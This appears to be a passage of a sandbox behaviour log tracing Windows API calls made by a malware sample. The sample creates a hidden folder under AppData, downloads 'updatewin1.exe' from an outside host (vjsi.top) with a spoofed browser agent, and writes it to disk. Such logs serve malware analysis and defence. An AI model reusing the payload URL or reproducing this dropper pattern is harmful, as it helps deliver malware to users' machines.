hHeap=0x4970000, dwFlags=0x0, lpMem=0x756eda0 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756f628 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756feb0 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7570738 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7570fc0 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7571848 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75720d0 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f1740 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75472d0 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f960 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755e768 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754f890 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7546268 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7520140 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4992460 | out: hHeap=0x4970000) returned 1 [0135.236] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49906f0 | out: hHeap=0x4970000) returned 1 [0135.236] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ed04 | out: phModule=0x18ed04) returned 0 [0135.236] ExitProcess (uExitCode=0x0) [0135.236] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7505df8 | out: hHeap=0x4970000) returned 1 [0135.236] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x498f2c8 | out: hHeap=0x4970000) returned 1 [0135.244] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 85 os_tid = 0xad8 Thread: id = 86 os_tid = 0x348 Thread: id = 87 os_tid = 0xb5c Thread: id = 88 os_tid = 0x5e4 Thread: id = 89 os_tid = 0xa40 Thread: id = 90 os_tid = 0xb50 Thread: id = 91 os_tid = 0xa4c Thread: id = 92 os_tid = 0xb58 Thread: id = 93 os_tid = 0xb34 [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x110) returned 0x74e3210 [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x110) returned 0x74b6528 [0112.211] GetLastError () returned 0x54f [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3bc) returned 0x74fb2a0 [0112.211] GetCurrentThreadId () returned 0xb34 [0112.211] SetLastError (dwErrCode=0x54f) [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x49ba720 [0112.211] GetLastError () returned 0x54f [0112.211] SetLastError (dwErrCode=0x54f) [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5898 [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3400 [0112.211] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49ba720 | out: hHeap=0x4970000) returned 1 [0112.211] GetLastError () returned 0x54f [0112.211] SetLastError (dwErrCode=0x54f) [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3240 [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x48) returned 0x74ff308 [0112.211] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3400 | out: hHeap=0x4970000) returned 1 [0112.211] GetLastError () returned 0x54f [0112.211] SetLastError (dwErrCode=0x54f) [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3400 [0112.211] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f890 [0112.212] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74ff308 | out: hHeap=0x4970000) returned 1 [0112.212] GetLastError () returned 0x54f [0112.212] SetLastError (dwErrCode=0x54f) [0112.212] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3320 [0112.212] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0x74d1860 [0112.212] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f890 | out: hHeap=0x4970000) returned 1 [0112.212] GetLastError () returned 0x54f [0112.212] SetLastError (dwErrCode=0x54f) [0112.212] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0112.212] GetLastError () returned 0x54f [0112.212] SetLastError (dwErrCode=0x54f) [0112.212] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74b6528 | out: hHeap=0x4970000) returned 1 [0112.212] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0112.212] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0112.212] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x400) returned 0x74fb668 [0112.212] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x74fb668 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0112.213] UuidCreate (in: Uuid=0xdccd768 | out: Uuid=0xdccd768) returned 0x0 [0112.293] UuidToStringA (in: Uuid=0xdccd768, StringUuid=0xdccd6c0 | out: StringUuid=0xdccd6c0) returned 0x0 [0112.293] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3390 [0112.293] RpcStringFreeA (in: String=0xdccd6c0 | out: String=0xdccd6c0) returned 0x0 [0112.293] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="40b348bf-da79-4308-8258-aae3cfc82a0b" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned 1 [0112.293] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b"), lpSecurityAttributes=0x0) returned 1 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x410) returned 0x74f1dc0 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x410) returned 0x74f21d8 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1000) returned 0x7516fe8 [0112.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74f21d8, cbMultiByte=-1, lpWideCharStr=0x7516fe8, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned 81 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1010) returned 0x7517ff0 [0112.294] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0112.294] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x49ba700 [0112.294] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5928 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74f21d8 [0112.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74d5928, cbMultiByte=-1, lpWideCharStr=0x74f21d8, cchWideChar=1072 | out: lpWideCharStr="http://vjsi.top/files/penelop/updatewin1.exe") returned 45 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0x7516fe8 [0112.294] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0112.294] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5928 | out: hHeap=0x4970000) returned 1 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0x74f21d8 [0112.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7519008 [0112.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://vjsi.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x7519008, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://vjsi.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0112.295] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x7519840 [0112.295] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519008 | out: hHeap=0x4970000) returned 1 [0112.295] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0112.295] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://vjsi.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0112.836] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519840 | out: hHeap=0x4970000) returned 1 [0112.836] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xdccd6d0, lpdwBufferLength=0xdccd710, lpdwIndex=0x0 | out: lpBuffer=0xdccd6d0*, lpdwBufferLength=0xdccd710*=0x4, lpdwIndex=0x0) returned 1 [0112.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5a48 [0112.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0x750b118 [0112.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5a48 | out: hHeap=0x4970000) returned 1 [0112.856] lstrcpyA (in: lpString1=0x74fb668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" [0112.857] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe") returned 1 [0112.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f7c0 [0112.857] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e8 [0112.857] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.857] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0112.972] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.974] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0112.975] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.975] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.256] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.256] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.257] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.258] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.258] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.258] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.259] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.259] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.259] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.260] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.260] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.261] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.261] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.262] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.262] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.262] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.546] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.547] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.547] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.548] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.548] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.549] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.549] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.550] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.550] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.550] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.551] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.673] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.674] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.674] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.675] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.675] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.675] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.675] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.676] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.676] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.676] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.677] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.677] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.729] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.732] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.733] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.735] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0113.737] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.737] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0xa00) returned 1 [0113.738] WriteFile (in: hFile=0x5e8, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0xa00, lpOverlapped=0x0) returned 1 [0113.738] CloseHandle (hObject=0x5e8) returned 1 [0113.749] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0113.755] InternetCloseHandle (hInternet=0xcc0004) returned 